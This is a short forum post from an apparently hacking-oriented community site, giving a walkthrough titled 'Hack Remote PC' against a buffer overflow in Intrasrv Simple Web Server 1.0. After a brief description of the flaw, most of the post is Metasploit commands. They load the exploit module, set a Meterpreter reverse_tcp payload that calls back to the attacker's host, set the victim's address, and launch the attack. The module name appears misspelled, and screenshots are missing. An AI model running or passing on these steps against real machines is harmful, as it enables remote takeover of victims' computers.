• We just launched and are currently in beta. Join us as we build and grow the community.

Hack Remote PC using Intrasrv 1.0 Buffer Overflow

FreddyGamer

Parallel Computing Engineer
F Rep
0
0
0
Rep
0
F Vouches
0
0
0
Vouches
0
Posts
156
Likes
94
Bits
2 MONTHS
2 2 MONTHS OF SERVICE
LEVEL 1 400 XP
This module exploits a boundary condition error in Intrasrv Simple Web Server 1.0. The web interface does not validate the boundaries of an HTTP request string prior to copying the data to an insufficiently large buffer. Successful exploitation leads to arbitrary remote code execution in the context of the application.

Exploit Targets

Simple Web Server 1.0

Requirement

Attacker: Kali Linux

Victim PC: Windows XP SP 3

Open Kali Linux terminal type msfconsole

1.jpg


Now type use exploit/windows/http/intrastv_bof

msf exploit (intrastv_bof)>set payload windows/meterpreter/reverse_tcp

msf exploit (intrastv_bof)>set lhost 192.168.1.5 (IP of Local Host)

msf exploit (intrastv_bof)>set rhost 192.168.1.3 (IP of Victim PC)

msf exploit (intrastv_bof)>exploit

3.jpg


2.jpg
 

431,696

312,474

312,483

Top